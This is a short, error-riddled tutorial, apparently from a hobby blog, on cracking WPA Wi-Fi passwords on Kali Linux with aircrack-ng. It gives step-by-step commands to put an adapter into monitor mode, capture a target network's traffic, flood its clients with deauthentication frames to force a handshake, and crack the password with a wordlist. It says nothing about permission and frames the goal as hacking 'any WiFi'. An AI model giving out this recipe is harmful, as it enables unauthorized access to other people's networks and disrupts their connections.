How to Hack WPA WPS WiFi On Kali Linux
Intro.
Aircraqck-ng is free tool is't using for crack/Hack WPA WPS Wi-Fi Caputur file by
password list. Today we are hack a wifi by aricrack-ng Tool on kali linux. Every one know that the kali linux use
for hacking and pentesting. Kali linux Second Name is Hackers OS.
So Today we are hack a wifi on kali linux using aircrack-ng.
The many tool are avaible for hack wifi. All tool are free to use.
WiFi Hacking Tools On kali Linux
- aircrack-ng
- Fern-Wifi-Cracke
- Wifite
- Wifiphiser
- phisere
Start WiFi Hacking by aircrack-ng on Kali-Linux
Requerment For Hack any WiFi
Two Requerment have to hack any wifi- First Requerment is you need Wordlist/Password list.
- Miniman One Divise conneted to targeted WiFi
Follow my steps to Hack And Crack wifi
Step 1
Step. 1
Login Kali-Linux OS as root and Open Terminal.
Step 2
Step. 2
Now We are use [airmon-ng start wlan0] for see "wireless Adepter mode"
and start
hacking.
Step 3
Step. 3
In this step we are see who and which WiFi are avaible near by us.
Type
Following Command [airodump-ng wlan0mon] and hit Enter
Step 4
Step. 4
Ctrl + C for type new command
Step 5
Step. 5
airodump-ng --bssid (type bssid of wifi) --channel (type
Channel Number of
wifi) wlan0mon -w (give a path for save 5 capture file)
Step 6
Step. 6
New window Tyep [aireplay-ng -0 0 -a (bssid of wifi)
wlan0mon ]
Step 7
Step. 7
Check WPA Handshack file captured and not.
Step 8
Step. 8
aircrack-ng -w (Password list path)
(.Cap file path)
Step 9
Step. 9
airmon-ng stop wlan0mon
Give Same Suggestion